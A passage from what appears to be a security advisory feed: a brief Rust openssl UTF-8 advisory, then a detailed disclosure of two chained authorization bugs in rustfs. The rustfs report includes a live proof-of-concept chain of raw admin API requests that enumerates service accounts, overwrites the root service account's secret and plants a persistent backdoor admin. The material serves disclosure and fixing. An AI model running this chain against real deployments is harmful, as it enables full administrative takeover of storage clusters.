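    assert!(!is_protocol_localhost("app.evil.com", &protocols));
    println!("ok");
}
```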

الإصدارات المتأثرة

2.0.0 → 2.11.1

CVSS Vector

CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N

عالية
📦 openssl 📌 All versions < 0.10.79 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 `X509Ref::ocsp_responders` returns OCSP responder URLs from a certificate's AIA extension as `OpensslString`, whose `Deref<Target = str>` wraps the raw bytes with `str::from_utf8_unchecked`. OpenSSL does not enforce that the underlying IA5String is ASCII, so a certificate with no...
📅 2026-05-05 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

`X509Ref::ocsp_responders` returns OCSP responder URLs from a certificate's AIA extension as `OpensslString`, whose `Deref<Target = str>` wraps the raw bytes with `str::from_utf8_unchecked`. OpenSSL does not enforce that the underlying IA5String is ASCII, so a certificate with non-UTF-8 bytes in its OCSP accessLocation causes safe Rust code to construct a `&str` that violates the UTF-8 invariant — resulting in undefined behavior.
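The safe alternative to `str::from_utf8_unchecked` is the checked conversion, which surfaces non-UTF-8 bytes as an error instead of constructing an invalid `&str`. A self-contained illustration; the byte strings are made-up stand-ins for a hostile accessLocation value:

```rust
fn main() {
    // An ASCII IA5String is valid UTF-8 and converts cleanly.
    let ascii: &[u8] = b"http://ocsp.example.test/";
    assert!(std::str::from_utf8(ascii).is_ok());

    // A field carrying a stray 0xFF byte is not valid UTF-8. The checked
    // conversion reports the error; `from_utf8_unchecked` on these bytes
    // would instead yield a `&str` violating the UTF-8 invariant, which
    // is undefined behavior.
    let hostile: &[u8] = b"http://ocsp.example.test/\xFF";
    assert!(std::str::from_utf8(hostile).is_err());

    // Lossy conversion is one safe way to keep going: the bad byte becomes
    // U+FFFD REPLACEMENT CHARACTER.
    let repaired = String::from_utf8_lossy(hostile);
    assert!(repaired.ends_with('\u{FFFD}'));
    println!("ok");
}
```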

الإصدارات المتأثرة

All versions < 0.10.79

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N

عالية
📦 rustfs 📌 All versions < alpha.98 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ## Summary `ListServiceAccount` (`GET /rustfs/admin/v3/list-service-accounts?user=<other>`) authorizes cross-user requests against `UpdateServiceAccountAdminAction` instead of `ListServiceAccountsAdminAction` at `rustfs/src/admin/handlers/service_account.rs:936`. The handler acc...
📅 2026-05-05 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

## Summary

`ListServiceAccount` (`GET /rustfs/admin/v3/list-service-accounts?user=<other>`) authorizes cross-user requests against `UpdateServiceAccountAdminAction` instead of `ListServiceAccountsAdminAction` at `rustfs/src/admin/handlers/service_account.rs:936`. The handler accepts the **wrong** admin action and rejects the **correct** one:

- A user granted only `admin:UpdateServiceAccount` enumerates every service account in the cluster, including the root user's (HTTP 200, full metadata).
- A user granted only `admin:ListServiceAccounts` — the permission name every IAM document treats as "list service accounts" — receives HTTP 403 AccessDenied on the same request.

Because service account access keys act as the identifier a `UpdateServiceAccount` holder needs to rotate a secret, and the `UpdateServiceAccount` handler at `rustfs/src/admin/handlers/service_account.rs:489` performs no ownership check on the target access key, leaking those access keys lets a delegated "service account updater" role overwrite `root-sa-1`'s secret, authenticate as the root user's service account, and create a persistent backdoor admin with `admin:*` + `s3:*`.

Proven live end-to-end against `rustfs/rustfs:latest` (1.0.0-alpha.91, revision `d4ea14c2`) — the same revision is byte-identical on current `origin/main`.

## Vulnerability Details

- **Package:** `rustfs` (binary crate `rustfs`)
- **Affected versions:** From `0a2411f` (the initial `service_account.rs` check-in on 2026-03-15) through current HEAD `90e584a`. The vulnerable line has never been touched.
- **Fixed versions:** None
- **Vulnerable file:** `rustfs/src/admin/handlers/service_account.rs`
- **Vulnerable route:** `GET /rustfs/admin/v3/list-service-accounts?user=<other_user>` (`ListServiceAccount::call`)
- **CWE:** CWE-863 (Incorrect Authorization), chained with CWE-620 (Unverified Password Change) to reach CWE-269 (Improper Privilege Management)
- **CVSS (demonstrated chain to full admin):** `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H` = **10.0 Critical**. If scored as Scope:Unchanged the vector is `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` = **8.8 High**. The list bug alone (no chain) is `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N` = **6.5 Medium** and is what a maintainer would rate it if the Update ownership gap is out of scope for this report.

## Two Distinct Vulnerabilities

This report documents two bugs that chain to full RustFS administrative takeover. Each is independently fixable and independently a security issue:

**Vulnerability A — Wrong action constant in ListServiceAccount (CWE-863)**

`ListServiceAccount::call` at line 936 checks `UpdateServiceAccountAdminAction` instead of `ListServiceAccountsAdminAction`. This is a copy-paste typo: the three sibling list handlers (lines 658, 799, 1095) all use the correct constant. The result is a permission inversion — the correct permission (`admin:ListServiceAccounts`) is rejected, and the wrong one (`admin:UpdateServiceAccount`) is accepted. Independently, this is a Medium-severity cross-user information disclosure.

**Vulnerability B — Missing ownership check in UpdateServiceAccount (CWE-620)**

`UpdateServiceAccount::call` at lines 489-614 authorizes on possession of `admin:UpdateServiceAccount` but never verifies the target `?accessKey=` belongs to the caller or the caller's parent. Lines 522-525 contain a commented-out `get_service_account` call that would have loaded the target for such a check. This means any holder of `admin:UpdateServiceAccount` can overwrite any service account's secret in the cluster, regardless of ownership.

**Chain (A + B) — Full RustFS administrative takeover**

Vulnerability A leaks every service account's access key (including the root administrator's). Vulnerability B allows overwriting any SA's secret given its access key. Together: a user with a single permission (`admin:UpdateServiceAccount`) enumerates the root user's SA access key via the wrong-action list bug, overwrites its secret via the ownership-free update handler, authenticates as the root user's service account, and creates a persistent backdoor admin with full RustFS administrative control.

**Authorization mismatch at a glance:**

Exact policies attached to each test identity (retrieved from the running server via `GET /admin/v3/info-canned-policy`):

```
legit-list-pol     -> {"Action": ["admin:ListServiceAccounts"], "Resource": ["arn:aws:s3:::*"]}
list-sa-probe-pol  -> {"Action": ["admin:UpdateServiceAccount"], "Resource": ["arn:aws:s3:::*"]}
list-sa-restricted -> {"Action": ["admin:UpdateServiceAccount"], "Resource": ["arn:aws:s3:::probe-scope/*"]}
(zero-priv-user has no attached policy)
```

| Identity | Attached policy | `GET /list-service-accounts?user=rustfsadmin` | Expected |
|---|---|---|---|
| `probe-user` | `list-sa-probe-pol` (`admin:UpdateServiceAccount`) | **200** (full SA metadata) | 403 |
| `legit-list-user` | `legit-list-pol` (`admin:ListServiceAccounts`) | **403** AccessDenied | 200 |
| `restricted-update-user` | `list-sa-restricted` (`admin:UpdateServiceAccount` on `probe-scope/*`) | **200** | 403 |
| `zero-priv-user` | (none) | **403** | 403 |
| (unauthenticated) | n/a | **403** Signature required | 403 |

### Why the correct permission gets 403

The handler at line 936 calls `is_allowed` with the action `AdminAction::UpdateServiceAccountAdminAction`. The IAM engine performs an exact string match between the action in the `is_allowed` call (`admin:UpdateServiceAccount`) and the action in the caller's attached policy:

- `legit-list-user` has policy action `admin:ListServiceAccounts`. This does **not** match `admin:UpdateServiceAccount`. `is_allowed` returns false. The handler returns 403. The user who holds the *correct* permission for listing service accounts is denied.
- `probe-user` has policy action `admin:UpdateServiceAccount`. This **matches** `admin:UpdateServiceAccount`. `is_allowed` returns true. The handler returns 200. The user who holds a *different, unrelated* permission is granted access to a list endpoint.
- `restricted-update-user` has the same action string but resource-scoped to `arn:aws:s3:::probe-scope/*`. Admin-action statements skip resource matching (`crates/policy/src/policy/statement.rs:132`: `&& !self.is_admin() && !self.is_sts()`), so the resource restriction is ignored and `is_allowed` still returns true.

There is no wildcard, superset, or inheritance relationship between these two action strings. They are separate enum variants (`crates/policy/src/policy/action.rs:459-462`) with distinct `strum(serialize)` values. The IAM engine is working correctly; the handler passes the wrong action to it.

Raw request/response for `legit-list-user` (the counterintuitive 403):

```
GET /rustfs/admin/v3/list-service-accounts?user=rustfsadmin HTTP/1.1
Authorization: AWS4-HMAC-SHA256 Credential=legit-list-user/...

HTTP/1.1 403
<?xml version="1.0" encoding="UTF-8"?><Error><Code>AccessDenied</Code><Message>access denied</Message></Error>
```

**Why this is not "working as intended":**

- `admin:UpdateServiceAccount` and `admin:ListServiceAccounts` are distinct enum variants with distinct string representations. The codebase treats them as orthogonal permissions.
- Three sibling list handlers in the same file (lines 658, 799, 1095) all check `ListServiceAccountsAdminAction`. Only line 936 deviates.
- CVE-2026-22042 / GHSA-vcwh-pff9-64cc is the maintainers' own precedent: `ImportIam` checking `ExportIAMAction` was rated Medium and fixed. The same class of bug applies here.
- A zero-privilege user (no admin policies at all) cannot exploit either vulnerability — both handlers correctly enforce their respective `is_allowed` checks. The bug is that the list handler enforces the *wrong* action constant, not that it skips enforcement entirely.

## Root Cause — Vulnerability A (Wrong Action Constant)

`ListServiceAccount::call` is registered for `GET /rustfs/admin/v3/list-service-accounts` at `rustfs/src/admin/handlers/service_account.rs:137-141`. The cross-user branch (entered when `?user=<x>` does not match the caller) checks the wrong admin action:

```rust
// rustfs/src/admin/handlers/service_account.rs:931-953 (HEAD 90e584a, identical at d4ea14c2)
let target_account = if query.user.as_ref().is_some_and(|v| v != &cred.access_key) {
    if !iam_store
        .is_allowed(&Args {
            account: &cred.access_key,
            groups: &cred.groups,
            action: Action::AdminAction(AdminAction::UpdateServiceAccountAdminAction), // WRONG
            bucket: "",
            conditions: &get_condition_values(...),
            is_owner: owner,
            object: "",
            claims: cred.claims.as_ref().unwrap_or(&HashMap::new()),
            deny_only: false,
        })
        .await
    {
        return Err(s3_error!(AccessDenied, "access denied"));
    }
    query.user.unwrap_or_default()
} else if cred.parent_user.is_empty() {
    cred.access_key
} else {
    cred.parent_user
};
```

The action enum definitions are cleanly distinct at `crates/policy/src/policy/action.rs:459-464`:

```rust
#[strum(serialize = "admin:CreateServiceAccount")]
CreateServiceAccountAdminAction,
#[strum(serialize = "admin:UpdateServiceAccount")]
UpdateServiceAccountAdminAction,
#[strum(serialize = "admin:RemoveServiceAccount")]
RemoveServiceAccountAdminAction,
#[strum(serialize = "admin:ListServiceAccounts")]
ListServiceAccountsAdminAction,
```

Every *other* list handler in the same file authorizes on the correct constant:

```
rustfs/src/admin/handlers/service_account.rs:658   InfoServiceAccount::call -> ListServiceAccountsAdminAction
rustfs/src/admin/handlers/service_account.rs:799   InfoAccessKey::call      -> ListServiceAccountsAdminAction
rustfs/src/admin/handlers/service_account.rs:1095  ListAccessKeysBulk::call -> ListServiceAccountsAdminAction
```

Only `ListServiceAccount::call` at line 936 deviates. This is a typo/wiring error, not a design choice. `git blame` shows the line has been wrong since commit `0a2411f` (heihutu, 2026-03-15), the initial check-in of `service_account.rs`.

## Root Cause — Vulnerability B (Missing Ownership Check in Update)

Service account access keys are the identifier the `UpdateServiceAccount` handler accepts via the `?accessKey=` query string. Inspecting `UpdateServiceAccount::call` at `rustfs/src/admin/handlers/service_account.rs:489-614`:

```rust
let access_key = query.access_key; // line 509
...
if !iam_store.is_allowed(&Args {
    account: &cred.access_key,
    action: Action::AdminAction(AdminAction::UpdateServiceAccountAdminAction),
    ...
}).await {
    return Err(s3_error!(AccessDenied, "access denied"));
} // line 538-559
...
let updated_at = iam_store.update_service_account(&access_key, opts).await // line 579
    .map_err(...)?;
```

The handler authorizes on *possession of* `admin:UpdateServiceAccount` and **never checks** that the `?accessKey=` query parameter resolves to a service account owned by the caller.
Notably, lines 522-525 contain a commented-out `get_service_account` call that would have loaded the target SA for an ownership check — it was present in the initial commit and has been commented out since:

```rust
// let svc_account = iam_store.get_service_account(&access_key).await.map_err(|e| {
//     debug!("get service account failed, e: {:?}", e);
//     s3_error!(InternalError, "get service account failed")
// })?;
```

The inner `IamSys::update_service_account` at `crates/iam/src/sys.rs:495-501` delegates to `IamCache::update_service_account` at `crates/iam/src/manager.rs:663`, which loads the credentials by access-key name, verifies it is a service account, and overwrites `secret_key` — again, no ownership check:

```rust
// crates/iam/src/manager.rs:663
pub async fn update_service_account(&self, name: &str, opts: UpdateServiceAccountOpts) -> Result<OffsetDateTime> {
    let Some(ui) = self.cache.users.load().get(name).cloned() else {
        return Err(Error::NoSuchServiceAccount(name.to_string()));
    };
    ...
    let mut cr = ui.credentials.clone();
    let current_secret_key = cr.secret_key.clone();
    if let Some(secret) = opts.secret_key {
        if !is_secret_key_valid(&secret) {
            return Err(Error::InvalidSecretKeyLength);
        }
        cr.secret_key = secret; // <-- attacker-chosen
    }
    ...
```

So a holder of `admin:UpdateServiceAccount` who knows *any* service account's access key can overwrite its secret. The list bug at line 936 hands them every access key in the cluster, including `root-sa-1`. The two bugs together form a clean chain:

1. Attacker has a single admin permission: `admin:UpdateServiceAccount`.
2. Attacker calls `GET /v3/list-service-accounts?user=rustfsadmin` — vulnerable handler grants access.
3. Attacker reads `accessKey=root-sa-1` out of the response.
4. Attacker calls `POST /v3/update-service-account?accessKey=root-sa-1` with body `{"newSecretKey":"..."}` — ownership-less handler overwrites.
5. Attacker authenticates as `root-sa-1` with the chosen secret and inherits the root user's full `admin:*` + `s3:*` authority.

## Environment and Version Alignment

- Image: `rustfs/rustfs:latest`, digest `sha256:74f8eaad96124c7e019bedfb892b41a9429c495f57b883182427c5e9e9d53c6a`
- Labels: `org.opencontainers.image.version=1.0.0-alpha.91`, `org.opencontainers.image.revision=d4ea14c2ba99602314511d5862005f7b871ece37`, `org.opencontainers.image.build-type=prerelease`
- Source verification:

```
$ git show d4ea14c2:rustfs/src/admin/handlers/service_account.rs | sed -n '931,940p'
    let target_account = if query.user.as_ref().is_some_and(|v| v != &cred.access_key) {
        if !iam_store
            .is_allowed(&Args {
                account: &cred.access_key,
                groups: &cred.groups,
                action: Action::AdminAction(AdminAction::UpdateServiceAccountAdminAction),
                bucket: "",
                ...

$ git show origin/main:rustfs/src/admin/handlers/service_account.rs | sed -n '931,940p'
    let target_account = if query.user.as_ref().is_some_and(|v| v != &cred.access_key) {
        if !iam_store
            .is_allowed(&Args {
                account: &cred.access_key,
                groups: &cred.groups,
                action: Action::AdminAction(AdminAction::UpdateServiceAccountAdminAction),
                bucket: "",
                ...
```

Byte-identical. The shipped image contains the same vulnerable handler as the tip of main.

## Proof of Concept (executed live)

### Environment

```
docker run -d --name rustfs-poc --memory=2g -p 9100:9000 \
  -e RUSTFS_ACCESS_KEY=rustfsadmin -e RUSTFS_SECRET_KEY=rustfsadmin \
  rustfs/rustfs:latest
```

Root credentials: `rustfsadmin:rustfsadmin`.

### Step 1 — Provision the probe identity

The probe policy grants exactly **one** admin action, scoped to the broadest resource. Nothing else.
```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": ["admin:UpdateServiceAccount"],
      "Resource": ["arn:aws:s3:::*"]
    }
  ]
}
```

Creation as root:

```
PUT /rustfs/admin/v3/add-canned-policy?name=list-sa-probe-pol -> 200
PUT /rustfs/admin/v3/add-user?accessKey=probe-user -> 200 (secret: probe-secret1234)
PUT /rustfs/admin/v3/set-user-or-group-policy?userOrGroup=probe-user&isGroup=false&policyName=list-sa-probe-pol -> 200
PUT /rustfs/admin/v3/add-user?accessKey=victim-user -> 200 (no policy)
PUT /rustfs/admin/v3/add-service-accounts -> 200 (creates victim-sa-1 under victim-user)
PUT /rustfs/admin/v3/add-service-accounts -> 200 (creates root-sa-1 under rustfsadmin)
```

### Step 2 — Baseline: probe-user is actually constrained

Confirming `probe-user` is denied on unrelated admin endpoints so the "200 on list-service-accounts" is not the side effect of some ambient privilege:

```
GET /rustfs/admin/v3/list-users                 as probe-user -> 403 AccessDenied
GET /rustfs/admin/v3/info                       as probe-user -> 403 AccessDenied
GET /rustfs/admin/v3/list-canned-policies       as probe-user -> 403 AccessDenied
GET /rustfs/admin/v3/kms/status                 as probe-user -> 403 AccessDenied
PUT /rustfs/admin/v3/add-canned-policy?name=... as probe-user -> 403 AccessDenied
GET /rustfs/admin/v3/list-service-accounts      as probe-user -> 200 {"accounts":[]}  # self-scope OK
```

The self-scope list (no `user=` query) returns an empty array — the caller's own service account inventory, which is correctly allowed. This isolates the bug to the cross-user branch only.

### Step 3 — Primary exploit: enumerate other users' service accounts

```
GET /rustfs/admin/v3/list-service-accounts?user=victim-user as probe-user -> 200
{"accounts":[{"parentUser":"victim-user","accountStatus":"on","impliedPolicy":true,"accessKey":"victim-sa-1","name":"sa-victim-user-victim-sa-1","description":"probe target SA for user victim-user","expiration":null}]}

GET /rustfs/admin/v3/list-service-accounts?user=rustfsadmin as probe-user -> 200
{"accounts":[{"parentUser":"rustfsadmin","accountStatus":"on","impliedPolicy":true,"accessKey":"root-sa-1","name":"sa-rustfsadmin-root-sa-1","description":"probe target SA for user rustfsadmin","expiration":null}]}
```

Exposed per entry: `parentUser`, `accountStatus`, `impliedPolicy`, **`accessKey`**, `name`, `description`, `expiration`. The response does not leak secret keys or session tokens (those are cleared server-side), but it does leak the `accessKey` — the identifier that the `UpdateServiceAccount` endpoint consumes via `?accessKey=`.

### Step 4 — Differential: the correct permission gets denied

Created `legit-list-user` with a policy granting only `admin:ListServiceAccounts`:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": ["admin:ListServiceAccounts"],
      "Resource": ["arn:aws:s3:::*"]
    }
  ]
}
```

Running the same request:

```
GET /rustfs/admin/v3/list-service-accounts?user=rustfsadmin as legit-list-user -> 403
<?xml version="1.0" encoding="UTF-8"?><Error><Code>AccessDenied</Code><Message>access denied</Message></Error>
```

This is the damning evidence of inversion. The handler refuses the **correct** permission (`admin:ListServiceAccounts`) and accepts the **wrong** one (`admin:UpdateServiceAccount`). There is no superset/subset relationship in the action enum; these are two distinct constants. A deployment that grants its operators `admin:ListServiceAccounts` to view the service account inventory — the intuitive and documented approach — will see every cross-user list request return 403 until this bug is fixed.

The resource-scoped variant gave the same result as the broad variant:

```
# Policy: admin:UpdateServiceAccount on arn:aws:s3:::probe-scope/* (unrelated to any SA)
GET /rustfs/admin/v3/list-service-accounts?user=rustfsadmin as restricted-update-user -> 200 (same body as probe-user)
```

Resource restrictions on admin actions are skipped in `crates/policy/src/policy/statement.rs:132` (`&& !self.is_admin() && !self.is_sts()`), so the bug is equally reachable by an operator whose `admin:UpdateServiceAccount` grant was scoped to a specific bucket.

And unauthenticated requests are still rejected:

```
GET /rustfs/admin/v3/list-service-accounts?user=rustfsadmin (no signature) -> 403 "Signature is required"
```

This is an **authenticated privilege-boundary violation**, not a pre-auth bug.

### Step 4b — Zero-privilege user is correctly blocked

To confirm the bug is in the action constant (not a missing check), created `zero-priv-user` with **no policies at all**:

```
GET  /rustfs/admin/v3/list-service-accounts?user=rustfsadmin    as zero-priv-user -> 403 AccessDenied
POST /rustfs/admin/v3/update-service-account?accessKey=root-sa-1 as zero-priv-user -> 403 AccessDenied
GET  /rustfs/admin/v3/list-service-accounts                      as zero-priv-user -> 200 {"accounts":[]}  # self-scope only
```

The `is_allowed` check at line 936 fires and correctly blocks zero-priv-user because they have *no* admin permissions. The bug is not that the check is skipped — it is that the check uses the **wrong action constant**, so it grants access to users holding `admin:UpdateServiceAccount` (the wrong permission) and denies users holding `admin:ListServiceAccounts` (the correct permission).
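The inversion follows mechanically from exact-string action matching. A toy model of the decision (function and names invented; the real engine compares enum variants, with the same effect):

```rust
/// Toy model of an exact-match IAM check: a request is allowed only if the
/// action string the handler asks about appears in the caller's policy.
fn is_allowed(policy_actions: &[&str], requested_action: &str) -> bool {
    policy_actions.iter().any(|a| *a == requested_action)
}

fn main() {
    // The vulnerable handler asks about the wrong action.
    let buggy = "admin:UpdateServiceAccount"; // should be admin:ListServiceAccounts

    // Operator with the documented list permission: denied (the observed 403).
    assert!(!is_allowed(&["admin:ListServiceAccounts"], buggy));
    // Holder of the unrelated update permission: allowed (the observed 200).
    assert!(is_allowed(&["admin:UpdateServiceAccount"], buggy));

    // With the one-line fix the handler asks about the right action,
    // and the outcomes invert back to the documented behaviour.
    let fixed = "admin:ListServiceAccounts";
    assert!(is_allowed(&["admin:ListServiceAccounts"], fixed));
    assert!(!is_allowed(&["admin:UpdateServiceAccount"], fixed));
    println!("ok");
}
```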
### Step 5 — Full chain to RustFS admin takeover (persistent backdoor)

With `accessKey=root-sa-1` known, `probe-user` (still only `admin:UpdateServiceAccount`) hijacks the root service account's secret:

```
POST /rustfs/admin/v3/update-service-account?accessKey=root-sa-1 as probe-user
body: {"newSecretKey":"pwned-secret-2"}
-> 204 NoContent
```

Then re-signs and calls admin APIs as `root-sa-1/pwned-secret-2`:

```
GET /rustfs/admin/v3/list-users as root-sa-1/pwned-secret-2 -> 200
{"svinfo-user":{"policyName":"serverinfo-only","status":"enabled",...},
 "probe-user":{"policyName":"list-sa-probe-pol","status":"enabled",...},
 "readonly-user":{"policyName":"readonly","status":"enabled",...},
 "victim-user":{"status":"enabled",...}}

GET /rustfs/admin/v3/info as root-sa-1/pwned-secret-2 -> 200
{"mode":"online","backend":{"backendType":"Erasure","online":...},"buckets":{"count":...},"services":{...}}
```

Both endpoints previously returned 403 for `probe-user`. They now succeed because `root-sa-1` inherits `rustfsadmin`'s full authority. Extending the chain to a persistent backdoor, still driven by `probe-user`'s hijacked `root-sa-1` session:

```
PUT /rustfs/admin/v3/add-user?accessKey=backdoor-admin -> 200 (body: {"secretKey":"backdoor-secret-9","status":"enabled"})
PUT /rustfs/admin/v3/add-canned-policy?name=proof-admin-all -> 200 (body: admin:* + s3:*)
PUT /rustfs/admin/v3/set-user-or-group-policy?userOrGroup=backdoor-admin&isGroup=false&policyName=proof-admin-all -> 200
```

Direct authentication as the new admin (no further reliance on the hijacked SA):

```
GET /rustfs/admin/v3/list-users as backdoor-admin/backdoor-secret-9 -> 200 (same full user dump)
PUT /proof-admin-bucket as backdoor-admin/backdoor-secret-9 -> 200 (new bucket created on the S3 plane)
```

The attacker now owns a persistent admin identity with `admin:*` and `s3:*` that will survive secret rotations on `root-sa-1`. Starting identity was a user granted exactly one admin action.
### Full PoC scripts

Runnable top-to-bottom against a fresh `rustfs/rustfs:latest` container. Each script prints raw HTTP status codes and response bodies.

- `poc/01_setup_probe_user.py` — create policies, users, service accounts.
- `poc/02_baseline_probe.py` — 403/200 differential on unrelated admin endpoints.
- `poc/03_exploit.py` — primary ListServiceAccount enumeration.
- `poc/04_escalate_takeover.py` — hijack root-sa-1 and prove admin calls.
- `poc/05_full_root_compromise.py` — end-to-end chain including backdoor-admin creation and new bucket.
- `poc/06_differential_and_resource.py` — legit-list-user 403 and resource-scoped 200.

## Impact

1. **Full RustFS administrative takeover (Confidentiality: High, Integrity: High, Availability: High).** A user with a single admin permission (`admin:UpdateServiceAccount`) chains the list bug with the ownership-free `UpdateServiceAccount` handler to overwrite any service account's secret — including the root administrator's — and inherit full `admin:*` + `s3:*` authority over the RustFS deployment. Demonstrated live: probe-user → list → hijack root-sa-1 → create persistent backdoor-admin → create bucket.
2. **Authorization inversion on a core admin endpoint (Integrity).** Users granted the intended `admin:ListServiceAccounts` permission receive 403 on cross-user list requests. A rustfs deployment that issues `admin:ListServiceAccounts` to its operators (the obvious and documented interpretation of the action name) is silently broken until this is fixed.
3. **Cross-user service-account inventory disclosure (Confidentiality: High).** Even absent the update-ownership gap, the bug exposes every service account's access key, owning principal, name, description, account status, and expiration to any `admin:UpdateServiceAccount` holder. This maps the full service-account topology of the cluster and identifies which account to target for a secret rotation attack.
4. **Resource-scoped policies provide no mitigation (Integrity).** `statement.rs:132` skips resource matching for admin statements, so restricting `admin:UpdateServiceAccount` to a specific bucket ARN (the usual pattern for bounded delegation) gives a false sense of isolation and does not reduce the blast radius of this bug.

## Suggested Fix

The minimal, correct fix is a one-line change at `rustfs/src/admin/handlers/service_account.rs:936`:

```diff
 // rustfs/src/admin/handlers/service_account.rs:936
-action: Action::AdminAction(AdminAction::UpdateServiceAccountAdminAction),
+action: Action::AdminAction(AdminAction::ListServiceAccountsAdminAction),
```

This brings `ListServiceAccount` in line with the three sibling handlers (lines 658, 799, 1095) that correctly enforce `ListServiceAccountsAdminAction`, and restores the documented meaning of the `admin:ListServiceAccounts` permission for operators who rely on it.

### Recommended follow-up (separate but related)

Even after this fix, `UpdateServiceAccount::call` at `rustfs/src/admin/handlers/service_account.rs:489-614` will still lack any check that the target `?accessKey=` belongs to the caller (or the caller's parent), so any holder of `admin:UpdateServiceAccount` who can otherwise obtain the access key of a higher-privileged service account can still hijack it. Consider adding an ownership precondition inside the handler before calling `iam_store.update_service_account`:

```rust
let target = iam_store.get_service_account(&access_key).await
    .map_err(|e| map_service_account_lookup_error(e, "get service account failed"))?;
let caller_parent = if cred.parent_user.is_empty() {
    cred.access_key.as_str()
} else {
    cred.parent_user.as_str()
};
if target.0.parent_user != caller_parent && !is_owner {
    // Only root or the parent user should be able to mutate this SA.
    // (Or additionally require a dedicated admin action granted to full admins.)
    return Err(s3_error!(AccessDenied, "access denied"));
}
```

This additional check closes the secret-rotation primitive for non-root holders of `admin:UpdateServiceAccount`. It is outside the strict scope of the line-936 typo, but the live PoC shows it is the mechanism by which information disclosure escalates to full administrative takeover, so fixing both in one advisory avoids leaving a usable primitive in place.

## Self-Review

- **Is this by-design?** No. The three sibling list handlers at lines 658, 799, and 1095 all enforce `ListServiceAccountsAdminAction`. The action enum has distinct `admin:UpdateServiceAccount` and `admin:ListServiceAccounts` strings with no wildcard relationship. There is no comment, test, or docstring suggesting the deviation at line 936 is intentional. CVE-2026-22042 / GHSA-vcwh-pff9-64cc (`ImportIam` using `ExportIAMAction`) is the maintainers' own precedent that this class of bug is treated as a real security issue.
- **Reachability?** Proven live on `rustfs/rustfs:latest` revision `d4ea14c2`. Response bodies captured in the report above and in `poc/` logs.
- **Is there upstream routing that enforces admin?** No. `S3Router::register` dispatches directly from `service_account.rs:137-141` into `ListServiceAccount::call`; the only authorization is the `is_allowed` call at lines 931-953. Confirmed by the 200 return for `probe-user` and the 403 return for `legit-list-user` on the same path.
- **Prior art?** No existing rustfs advisory covers this handler. `CVE-2026-22042` is the same *class* of bug in a different handler; `CVE-2026-22043` is a `deny_only` short-circuit bug in the same file but a completely different code path. Both are explicitly distinct from the line 936 typo.
- **Is the docker image the same code as main?** Yes.
Image label `org.opencontainers.image.revision=d4ea14c2`; `git show d4ea14c2:rustfs/src/admin/handlers/service_account.rs` at lines 931-960 is byte-identical to `git show origin/main:rustfs/src/admin/handlers/service_account.rs`. Re-verified on 2026-04-09 at HEAD `90e584a` — file unchanged since initial commit `0a2411f`. - The commented-out ownership check at lines 522-525 of `UpdateServiceAccount::call` demonstrates the developer was aware an ownership check belonged there but left it disabled. This is not a design decision — it is incomplete implementation that this report's chain exploits. - **Honest limitations:** - The primary exploit requires an authenticated principal with `admin:UpdateServiceAccount`. It is not pre-auth. - Secret keys of the enumerated service accounts are NOT returned by the list handler (they are explicitly cleared elsewhere). Only the access key is disclosed. The escalation to RustFS admin relies on the *Update* path to overwrite the secret, not on reading a leaked secret. - The full administrative takeover chain depends on the separate `UpdateServiceAccount` ownership gap. If a reviewer considers that gap out of scope for this report, the line-936 typo on its own is best-rated as **Medium** cross-user information disclosure (`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N` = 6.5). The live PoC and differential stand independent of that scoping. - The differential (legit-list-user → 403, probe-user → 200) isolates the cause to the handler's action constant and is reproducible in seconds against a fresh container. 
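The heart of the line-936 bug is a handler that authorizes one operation against the action constant of another. The following toy model (illustrative names only, not rustfs's actual types or handlers) reproduces why the 200/403 differential inverts exactly as observed in the PoC:

```rust
// Toy model of the authorization confusion: the "list" handler validates the
// wrong action constant, so the permission grid is inverted.
#[derive(Clone, Copy, PartialEq, Eq, Debug)]
enum AdminAction {
    ListServiceAccounts,
    UpdateServiceAccount,
}

struct Policy {
    allowed: Vec<AdminAction>,
}

impl Policy {
    fn is_allowed(&self, action: AdminAction) -> bool {
        self.allowed.contains(&action)
    }
}

// Buggy guard (the report's line-936 typo): a list request checks the
// Update action, so update-permission holders can list cross-user,
// while holders of the intended list permission get 403.
fn list_service_accounts_buggy(caller: &Policy) -> Result<&'static str, u16> {
    if caller.is_allowed(AdminAction::UpdateServiceAccount) {
        Ok("cross-user service account inventory")
    } else {
        Err(403)
    }
}

// Fixed guard: check the action that matches the operation, as the three
// sibling handlers do.
fn list_service_accounts_fixed(caller: &Policy) -> Result<&'static str, u16> {
    if caller.is_allowed(AdminAction::ListServiceAccounts) {
        Ok("cross-user service account inventory")
    } else {
        Err(403)
    }
}
```

With this model, a `probe-user` equivalent (only the update action) passes the buggy guard while a `legit-list-user` equivalent (only the list action) is rejected, which is the differential the report isolates.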
